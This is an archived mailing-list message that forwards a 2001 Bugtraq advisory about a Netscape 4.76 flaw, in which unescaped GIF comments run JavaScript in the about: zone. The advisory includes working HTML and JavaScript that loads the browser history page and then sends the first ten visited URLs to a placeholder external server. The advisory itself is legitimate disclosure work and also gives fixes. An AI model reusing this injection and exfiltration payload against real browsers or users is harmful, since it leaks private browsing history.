Date: Tue, 10 Apr 2001 19:24:52 -0400 (EDT) From: Trevor Johnson <trevor@jpj.net> To: <security@freebsd.org>, <security-officer@freebsd.org> Subject: Netscape 4.76 gif comment flaw (fwd) Message-ID: <20010410192130.X3987-100000@blues.jpj.net>
next in thread | raw e-mail | index | archive | help
I tried this with the 4.75 BSD/OS version, and found it has the bug.
--
Trevor Johnson
---------- Forwarded message ----------
Received: from lists.securityfocus.com (lists.securityfocus.com
[66.38.151.7])
by blues.jpj.net (8.11.1/8.11.1) with ESMTP id f39LbDa19977;
Mon, 9 Apr 2001 17:37:13 -0400 (EDT)
Received: from lists.securityfocus.com (lists.securityfocus.com
[66.38.151.7])
by lists.securityfocus.com (Postfix) with ESMTP
id 84B7E24C9AD; Mon, 9 Apr 2001 15:32:36 -0600 (MDT)
Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM
(LISTSERV-TCP/IP release 1.8d) with spool id 32328086 for
BUGTRAQ@LISTS.SECURITYFOCUS.COM; Mon, 9 Apr 2001 15:32:01 -0600
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Received: from securityfocus.com (mail.securityfocus.com [66.38.151.9]) by
lists.securityfocus.com (Postfix) with SMTP id 9B7D124C476 for
<bugtraq@lists.securityfocus.com>; Mon, 9 Apr 2001 05:48:19 -0600
(MDT)
Received: (qmail 6555 invoked by alias); 9 Apr 2001 11:48:18 -0000
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
Received: (qmail 6534 invoked from network); 9 Apr 2001 11:48:17 -0000
Received: from mail-ffm-p.arcor-ip.de (HELO mail.arcor-ip.de)
(145.253.2.10) by
mail.securityfocus.com with SMTP; 9 Apr 2001 11:48:17 -0000
Received: from parallax.dividuum.com (145.253.171.27) by mail.arcor-ip.de; 9
Apr 2001 13:48:15 +0200
Received: by parallax.dividuum.com (Postfix,
from userid 500) id 3F3F23AD60; Mon,
9 Apr 2001 13:48:26 +0200 (CEST)
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="FL5UXtIhxfXey3p5"
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
Message-ID: <20010409134826.A2541@dividuum.de>
Date: Mon, 9 Apr 2001 13:48:26 +0200
Reply-To: Florian Wesch <fw@DIVIDUUM.DE>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Florian Wesch <fw@DIVIDUUM.DE>
Subject: Netscape 4.76 gif comment flaw
To: BUGTRAQ@SECURITYFOCUS.COM
Product: Netscape Navigator/Communicator
Tested on: 4.76 (on Linux and Win98/NT)
Vendor Contact: Reported 2001-03-22
{ Problem }--------------------------------------------------------
- Overview:
The Netscape browser does not escape the gif file comment in the
image information page. This allows javascript execution in the
"about:" protocol and can for example be used to upload the
History (about:global) to a webserver.
- Detail:
Netscape does not allow javascript to access documents from
a different domain. This stops a javascript from one domain
that tries to mess around with login forms/private data from other
domain. The following error message is shown
"access disallowed from scripts at <javascriptdomain> to documents
at another domain."
Now there is the protocol "about:" that is used
for some special tasks.
about: - shows Netscape version and copyrights
about:blank - shows a blank document
about:config - shows Browser configuration.
about:global - shows Information about the Netscape global history
about:<url> - shows Information about the specified url
..
There are some other about: documents (try grepping the netscape binary).
about:global is very interesting since all visited documents are
listed there. So I tried to find a way to access this information.
I created a frameset with 2 frames. The first Frame (called foo)
contains about:global. Using <frame src="about:global">,
<meta http-equiv="refresh" content="10; URL=about:global"> or
document.location.href="about.global"; for setting this url did not
work. So I used the following trick to make it work:
<base href="about:">
<form action="global" name="loadhistory">
<input type="submit">
</form>
<script language="javascript">
document.loadhistory.submit();
</script>
My intention is that the second frame (called bar) grabs 10 urls
in the first frame using javascript and sends them to the server.
Accessing parent.frames["foo"].document.links does not work since
foo is displaying an about: document and bar is a normal http document:
"access disallowed from scripts at blah to documents..."
So I tried to find a way to start a javascript within an
about: document. about:<someurl> comes into mind since there are
a lot server specified values.
First I tried to inject javascript using the url of the script.
But since this url is encoded (space => %20 etc.) there is no way
in. Modifying the Content-Type (File MIME Type) did not work
either because Netscape opens a "Save as..." window when
supplying an unknown mimetype.
Then I remembered that Netscape shows the comment included in
gif files. A quick test showed that the comment is not escaped.
So Javascript in gif comments is executed in the about: realm.
This means that this script can then access the content of
about:global. nice.
The following script included in the comment reads 10 urls in
the about:global frame (foo), stores them in the form and finally
submits this form.
<form action=http://bla/ns476history.php target=_parent name=s method=get>
<input name=u>
</form>
<script>
f=parent.frames["foo"].document;
l="";
for(i=0;i<10;i++)
l+=f.links[i]+"|";
document.s.u.value=l;
document.s.submit();
</script>
The server has 10 urls of about:global urls now.
Accessing about:config should be possible too, but
I did not try it.
{ Solution }--------------------------------------------------------
Disable Javascript
or
Upgrade to 4.77
{ Exploit }---------------------------------------------------------
attached
or
http://dividuum.de/security/netscape/
--------------------------------------------------------------------
Regards,
Florian Wesch <fw@dividuum.de>
http://dividuum.de
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?20010410192130.X3987-100000>